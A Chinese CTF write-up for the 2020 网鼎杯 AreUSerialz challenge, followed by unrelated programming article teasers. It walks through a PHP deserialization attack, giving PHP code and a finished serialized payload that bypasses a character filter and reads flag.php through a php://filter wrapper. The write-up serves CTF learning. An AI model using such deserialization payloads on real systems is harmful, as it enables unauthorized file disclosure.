当前位置：首页 > news >正文

web：[网鼎杯 2020 青龙组]AreUSerialz

news 2026/3/28 5:46:27

题目

点进题目发现

需要进行代码审计

function __destruct() {if($this->op === "2")$this->op = "1";$this->content = "";$this->process();}

这里有__destruct()函数，在对象销毁时自动调用，根据$op属性的值进行一些操作，并重置属性的值，后再次调用process()方法，同时该函数会根据op变量值的不同，会相应调用读写函数

即op=="1",进入write方法，op=="2"进入read方法进行处理

总体解题思路为，构造反序列化给str变量，当主函数进行反序列化时，调用了FileHandler类，读取flag.php

if(isset($_GET{'str'})) {$str = (string)$_GET['str'];if(is_valid($str)) {$obj = unserialize($str);}

接收到名为str的get参数，参数会被反序列化，并创建一个对象，在反序列化之前，会使用is_valid()函数对字符串进行验证，传入的string要是可见字符串ascii值为32-125

这里要构造op=2，要联想至上面的destruct方法，当op=2时会自动执行魔术方法_destruct，绕过if($this->op==="2")这条强类型判断，2===“2”为假（左边为数字int，右边为字符串string），会执行process方法，2==“2”为真，执行read方法，读取文件

注意成员变量是protected属性，会在变名前加%00*%00，注意is_valid方法，%00的ascii码为0，无法通过检查，需要绕过

绕过方法：

1.php7.1+版本对属性类型不敏感，本地序列化的时候将属性改为public进行绕过即可

2.php的序列化字符串中只要把其中的s改成大写的S，后面的字符串就可以用十六进制表示

php伪协议进行读取

构造payload

<?phpclass FileHandler
{public $op = 2;public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
//伪协议转化为base64读取，php代码无法直接读取public $content;}
$A=new FileHandler();
$B=serialize($A);
echo $B;

O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}

直接传参得不到flag

反序列化完的结果看似没有包含0，但实际上有ascii码为0的

这里需要对$B进行两次替换操作

使用 str_replace() 函数将字符串中的空字符（ASCII 值为 0）替换为 \00。
使用 str_replace() 函数将字符串中的 "s:" 替换为 "S:"。

构造payload

<?phpclass FileHandler
{protected $op = 2;protected $filename = "php://filter/read=convert.base64-encode/resource=flag.php";protected $content;}
$A=new FileHandler();
$B=serialize($A);
$B = str_replace(chr(0), '\00', $B);
$B = str_replace('s:', 'S:', $B);
echo $B;

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:57:"php://filter/read=convert.base64-encode/resource=flag.php";S:10:"\00*\00content";N;}

传参可得

查看源码

解码可得

参考文章链接：

https://www.cnblogs.com/akger/p/15137082.html

第二届网鼎杯（青龙组）部分wp-安全客 - 安全资讯平台

web：[网鼎杯 2020 青龙组]AreUSerialz

题目点进题目发现需要进行代码审计 function __destruct() {if($this->op "2")$this->op "1";$this->content "";$this->process();}这里有__destruct()函数，在对象销毁时自动调用，根据$op属性的值进行…...

编程日记 2023/10/30 11:18:58

【Python机器学习】零基础掌握PolynomialCountSketch内核近似特征

面临挑战的机器学习模型：如何提高准确性？在实际应用中，机器学习模型常常面临一个问题：如何在保持模型复杂性不变的情况下，提高模型的准确性？特别是在处理高维数据集时，这个问题尤为突出。这里，有一种名为“核方法”的技术可以解决这个问题，但通常会增加计算成本。那…...

编程日记 2023/10/30 11:17:57

【Linux】深入理解系统文件操作（1w字超详解）

1.系统下的文件操作： ❓是不是只有C\C有文件操作呢？💡Python、Java、PHP、go也有，他们的文件操作的方法是不一样的啊 1.1对于文件操作的思考： 我们之前就说过了：文件内容属性针对文件的操作就变成了对…...

编程日记 2023/10/30 11:15:55

echarts柱状图和折线图双图表配置项

{tooltip: {trigger: axis,axisPointer: { // 坐标轴指示器，坐标轴触发有效type: cross // 默认为直线，可选为：line | shadow}},legend: {data: [新增客户数, 新增客户两年内回款情况],type: scroll,selectedMode: false // 控制是否可以通过…...

编程日记 2023/10/30 11:12:39

【LVS实战】02 搭建一个LVS-NAT实验

一、网络结构用虚拟机搭建如下的几台机器，并配置如下的ip 关于虚拟机网卡和网络的配置，可以参考 iptables章节，05节：网络转发实验主机A模拟外网的机器 B为负载均衡的机器 C和D为 RealServer 二、C和D主机的网关设置 C和D机…...

编程日记 2023/10/30 11:11:21

2023.10.26-SQL测试题

employee表： department表： job表： location表： 题目及答案： -- (1).查询工资大于一万的员工的姓名(first_name与last_name用“.”进行连接)和工资-- select CONCAT(first_name,.,last_name) as 姓名 ,salary -…...

编程日记 2023/10/30 11:10:20

JVM虚拟机：从结构到指令让你对栈有足够的认识

本文重点在前面的课程中，我们学习了运行时数据区的大概情况，从本文开始，我们将对一些组件进行详细的介绍，本文我们将学习栈。栈内存主管java的运行，是在线程创建时创建的，它是线程私有的，它的生命周期是跟随线程的生命期，也就是说线程结束栈内存就释放了，对于栈来说…...

编程日记 2023/10/30 11:08:18

【启发式算法】白鲸优化算法【附python实现代码】

写在前面： 首先感谢兄弟们的订阅，让我有创作的动力，在创作过程我会尽最大能力，保证作品的质量，如果有问题，可以私信我，让我们携手共进，共创辉煌。路虽远，行则将至&#…...

编程日记 2023/10/30 11:07:17

【Python机器学习】零基础掌握RBFSampler内核近似特征

有没有想过如何在复杂的数据集上快速进行分类？在现实生活中，大量的数据集通常非常复杂，并不总是线性可分的。例如，在医疗领域，诊断患者是否患有某种疾病通常涉及多个变量和复杂的模式。简单的线性模型可能无法有效地处理这种复杂性。一种可能的解决方案是使用更复杂的…...

编程日记 2023/10/30 11:03:58

高级工技能等级认定---网络设备安全

目录一、DHCP 安全配置二、SSH配置三、标准ACL的配置四、配置交换机端口安全五、三层交换和ACL的配置一、DHCP 安全配置配置要求： 1.给交换机配置enable密码. 2.在交换机上创建VLAN 100，将F0/1-3口改为Access口，并加入到VLAN …...

编程日记 2023/10/30 11:02:57

spting Boot常见知识点

31.介绍一下 SpringBoot，有哪些优点？ 1、Spring Boot 基于 Spring 开发，Spirng Boot 本身并不提供 Spring 框架的核心特性以及扩展功能，只是用于快速、敏捷地开发新一代基于 Spring 框架的应用程序。它并不是用来替代 Spring 的解…...

编程日记 2023/10/30 11:00:55

大模型在数据分析场景下的能力评测

“你们能对接国产大模型吗？” “开源的 LLaMA 能用吗，中文支持怎么样？” “私有化部署和在线服务哪个更合适？” 自 7 月 14 日发布 AI 数智助理 Kyligence Copilot 后，我们收到了很多类似上面的咨询，尤其…...

编程日记 2023/10/30 10:58:40

[笔记] 关于y1变量取名冲突的问题

参考博客遇到的问题和这位老哥的一模一样。结论是：当我们用math头文件的时候，不能在全局定义 y0 和 y1，j0、j1、jn、yn。...

编程日记 2023/10/30 10:57:39

js笔记（函数参数、面向对象、装饰器、高级函数、捕获异常）

JavaScript 笔记函数参数默认参数在 JavaScript 中，我们可以为函数的参数设置默认值。如果调用函数时没有传递参数，那么参数将使用默认值。 function greet(name World) {console.log(Hello, ${name}!); }greet(); // 输出：Hello, Wo…...

编程日记 2023/10/30 10:56:38

Istio实战（八）- Istio 动态准入 Webhook 配置

准入 Webhook 是 HTTP 方式的回调，接收准入请求并对其进行相关操作。可定义两种类型的准入 Webhook，Validating 准入 Webhook 和 Mutating 准入 Webhook。使用 Validating Webhook，可以通过自定义的准入策略来拒绝请求； 使用 Mut…...

编程日记 2023/10/30 10:55:37

----------------------------------------------------前置---------------------------------------------------- 1.node.js的下载安装、缓存路径的设置 ①安装 ②设置npm prefix, cache 2.NODE_PATH、PATH ①系统变量中加 ②PATH中加 3.配置镜像源 -----------------------…...

编程日记 2023/10/30 10:54:36

macOS M1安装wxPython报错

macOS12.6.6 M1安装wxPython失败： 报错如下： imagtiff.cpp:37:14: fatal error: tiff.h file not found解决办法： 下载源文件重新编译（很快，5分钟全部搞定），分三步走： 第一步&…...

编程日记 2023/10/30 10:53:35

【数据结构】交换排序

⭐ 作者：小胡_不糊涂 🌱 作者主页：小胡_不糊涂的个人主页 📀 收录专栏：浅谈数据结构 💖 持续更文，关注博主少走弯路，谢谢大家支持 💖 冒泡、快速排序 1. 冒泡排序2. 快速…...

编程日记 2023/10/30 10:51:30

腾讯云2023年双11服务器优惠活动及价格表

腾讯云2023年双11大促活动正在火热进行中，腾讯云推出了一系列服务器优惠活动，云服务器首年1.8折起，买1年送3个月！境外云服务器15元/月起，买更多省更多！下面给大家分享腾讯云双11服务器优惠活动及价格表&…...

编程日记 2023/10/30 10:50:27

PointNet++复现、论文和代码研读

文章目录复现1.创建虚拟环境并进入2.安装pytorch3.分割模型的训练和测试3.1.下载数据处理数据3.2.训练分割模型3.3分割模型的测试 4.分类模型的训练和测试论文研读制作自己的数据集流程分割模型数据集准备复现 https://github.com/yanx27/Pointnet_Pointnet2_pytorch 1.创…...

编程日记 2023/10/30 10:48:25

FreeMoCap终极指南：如何用普通摄像头实现专业级3D动作捕捉

FreeMoCap终极指南：如何用普通摄像头实现专业级3D动作捕捉【免费下载链接】freemocap Free Motion Capture for Everyone 💀✨ 项目地址: https://gitcode.com/GitHub_Trending/fr/freemocap 还在为专业动作捕捉设备的高昂价格而烦恼吗&#xff…...

编程新知 2026/3/28 4:52:06